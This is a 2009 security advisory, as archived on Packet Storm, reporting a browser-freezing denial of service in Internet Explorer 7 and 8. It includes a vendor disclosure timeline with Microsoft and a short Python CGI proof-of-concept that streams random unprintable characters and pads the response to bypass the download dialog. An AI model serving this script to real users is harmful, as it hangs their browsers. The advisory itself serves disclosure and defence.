what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Blue Moon Security Advisory 2009-04

Blue Moon Security Advisory 2009-04
Posted Apr 14, 2009
Authored by Nam Nguyen | Site bluemoon.com.vn

A remote denial of service vulnerability has been discovered in Internet Explorer versions 7 and 8.

tags | exploit, remote, denial of service
SHA-256 | 6101dbb2325d668e2dc8877b0fa25bea11ad050495d39ccdd3b618b6ce4379bc

Blue Moon Security Advisory 2009-04

Change Mirror Download
BLUE MOON SECURITY ADVISORY 2009-04
===================================


:Title: Remote Denial of Service in Internet Explorer
:Severity: Moderate
:Reporter: Blue Moon Consulting
:Products: Internet Explorer 7 and 8
:Fixed in: --


Description
-----------

We could not find out the definitive description for Internet Explorer from Microsoft website. This is our own understanding of the application: Internet Explorer is a web browser.

We have discovered a remote DoS vulnerability in Internet Explorer 7 and 8. When visit a malicious page, the browser may freeze indefinitely and killing it in Task Manager is required. With IE8's default settings, killing the tab process simply launches another process and goes to the same malicious page, hence repeating the cycle. The root cause is unknown to us. We suspect that it is related to the display of unprintable characters on Windows XP, and Vista. The same problem does not occur in Windows 7.

Microsoft has classified this vulnerability as a stability (not security) issue and will be addressing it in the next version of the application.

Workaround
----------

There is no workaround.

Fix
---

This problem is to be fixed in the next version of Internet Explorer.

Disclosure
----------

Blue Moon Consulting adapts `RFPolicy v2.0 <http://www.wiretrip.net/rfp/policy.html>`_ in notifying vendors.

:Initial vendor contact:

March 19, 2009: Initial contact sent to secure@microsoft.com.

:Vendor response:

March 19, 2009: Tony replied stating the preference for PGP communication.

:Further communication:

March 20, 2009: Technical details and PoC code were sent to Tony, in PGP MIME format.

March 20, 2009: Tony replied with a new case identifier MSRC 9011jr and informed us of a new case manager, Jack.

March 21, 2009: We further reported that IE 8 was affected by the same bug, in PGP MIME format.

March 30, 2009: We asked if Microsoft had received our PoC.

March 31, 2009: Jack confirmed the receipt, and replied that Microsoft could not reproduce the behavior of this bug.

April 01, 2009: We clarified that we tested with IE 7, and IE 8 on Vista Business. Sent in PGP MIME format.

April 01, 2009: Jack said the email was stripped out and asked us to resend.

April 02, 2009: We resent the last email in plain text.

April 03, 2009: Jack told us Microsoft only experienced temporary DoS and in no case did Internet Explorer hang indefinitely.

April 06, 2009: We sent Jack a video clip, in PGP MIME format.

April 06, 2009: Jack asked us to resend because the email was stripped again.

April 07, 2009: We resent the clip in plain text to Jack.

April 09, 2009: Jack acknowledged the receipt and let us know the bug would be fixed in the next version of Internet Explorer.

April 09, 2009: We asked for a confirmation of bug classification.

April 09, 2009: Jack confirmed this bug was classified as stability, instead of a security issue. We therefore decided to release this advisory to the public.

:Public disclosure: April 11, 2009

:Exploit code: The following CGI script causes IE to hang indefinitely.

::

#!C:/python25/python
import sys
import random

CHAR_SET = [chr(x) for x in range(0x20)]
CHAR_SET += [chr(x) for x in range(128, 256)]

def send_file():
l = 800000 + 4096
print "Content-Type: text/plain"
print "Content-Length: %d" % l
print "Cache-Control: no-cache, no-store, must-revalidate"
# this is not standardized, but use it anyway
print "Pragma: no-cache"
print ""
# bypass IE download dialog
sys.stdout.write("a" * 4096)
# print junks
for i in xrange(l):
sys.stdout.write(random.choice(CHAR_SET))
sys.exit()

send_file()


Disclaimer
----------

The information provided in this advisory is provided "as is" without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time.

Cheers
--
Nam Nguyen
Blue Moon Consulting Co., Ltd
http://www.bluemoon.com.vn
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close